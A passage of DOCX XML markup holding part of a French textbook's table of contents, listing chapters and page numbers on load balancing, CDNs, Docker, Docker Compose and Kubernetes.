          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>543</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>61. Répartition de charge, proxy et CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>548</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>61.1 Ce que répartit un équilibreur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>548</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>61.2 Vérifications de santé</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>549</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>61.3 Proxy inverse et proxy direct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>550</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>61.4 CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>551</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>61.5 Pannes et dégradation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>551</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Partie III — Conteneurs et orchestration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>62. Docker : conteneurs, images et cycle de vie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>556</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>62.1 Un processus isolé, pas une machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>557</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>62.2 Le Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>558</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>62.3 Cycle de vie et ressources</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>559</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>62.4 Nettoyer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>560</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>63. Images reproductibles et sûres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>564</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>63.1 Reproductible, pas seulement fonctionnel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>564</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>63.2 Réduire la taille</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>565</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>63.3 Exécuter sans privilèges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>565</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>63.4 Analyser les vulnérabilités</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>566</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>63.5 Publier et versionner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>567</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>64. Réseaux et volumes Docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>571</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>64.1 Cinq pilotes réseau</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>571</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>64.2 Exposer, publier, exposer entre conteneurs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>572</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>64.3 Volumes, bind mounts et tmpfs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>573</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>64.4 Diagnostiquer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>574</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>65. Docker Compose : applications multi-services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>578</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>65.1 Un fichier, une application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>578</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>65.2 Commandes du quotidien</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>579</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>65.3 Surcharges et environnements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>580</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>65.4 Construire ou utiliser une image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>581</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>65.5 Diagnostiquer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>582</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>66. Kubernetes : modèle et objets fondamentaux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>586</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>66.1 Un état désiré, pas des commandes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>586</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>66.2 Le vocabulaire minimal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>587</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>66.3 Requêtes et limites</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>588</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>66.4 Sondes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>589</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>66.5 Appliquer et observer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>589</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>66.6 Diagnostiquer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>590</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>67. Services, entrées et configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>594</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>67.1 Le problème de l'adresse instable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>594</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>67.2 Ingress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>595</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>67.3 Configuration externe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>596</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
